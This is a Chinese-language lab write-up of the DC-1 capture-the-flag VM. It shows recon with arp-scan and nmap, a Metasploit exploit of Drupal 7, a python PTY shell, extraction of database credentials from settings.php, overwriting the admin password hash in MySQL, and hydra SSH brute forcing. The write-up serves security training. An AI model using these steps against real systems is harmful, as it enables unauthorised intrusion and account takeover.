Dc-1实验报告
步骤一:再开机之前,得先配置网络,这里得注意,DC1所处的网段跟kali所处的网段得互通,双击网络适配器,这里我选择的是NAT模式,kali和DC1都是NAT模式
配置好网络之后,打开kali和DC1
步骤二:使用arp-scan -l,查看网段所有的主机,可以得到DC1的IP地址
192.168.32.133
步骤三:寻找靶机真实IP
nmap -sP 1 XXX.XXX.XXX.XXX /24
步骤四:探端口以及服务
使用nmap对DC1进行扫描,nmap -A -p- -v 192.168.32.133
步骤五:
访问web站点
步骤六:发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
searchsploit drupal 7
步骤七:我们可以利用MSF渗透
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
我们先进入MSF控制台搜索drupal模块,然后进入MSF控制台msfdb run
再去搜索drupal模块search drupal
步骤八:选择模块进行测试
use 1
步骤九:设置靶机IP运行msf
Set rhosts 192.168.32.133
Run
步骤十:执行whoami
Shell
Whoami
步骤十一:我们发现是www-data权限
所以我们先进入home目录,我们发现flag4.txt文件,提示我们需要提升权限
步骤十二:我们要使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
步骤十三:
我们进入到了DC1的www-data用户下,并在当前目录下发现了flag1.txt,我们查看flag1.txt,得到提示根据提示寻找站点的配置文件
步骤十四:我们知道Drupal的默认配置文件是/var/www/sites/default/settings.php
然后我们查看文件内容
cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件
步骤十五:我们可以先进入数据库查看
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
之后查看数据库,我们要切换到drupaldb数据库里
步骤十六:我们要查找默认的Drupal user 表
select * from users;
我们可以看见admin信息
步骤十七:我们要置换掉drupal密码
步骤十八:我们需要进入www目录
quit;
要在站点路径下执行
php scripts/password-hash.sh +
新的密码
步骤十九:然后在进入数据库中把密码字段需要进行替换
我们先进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段替换掉
update
users
set
pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where
name="admin";
步骤二十:登录站点
在web访问站点
进行登录,密码是之前我们自己替换掉的,账号是admin
账号:admin
密码:123
成功登录
步骤二十一: 我们需要查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破
cat /etc/passwd
步骤二十二:我们需要进入john目录cd /usr/share/john
hydra -l flag4 -P password.lst ssh://192.168.66.140
实验就到这了,如果不够全面指导一下 撒花结束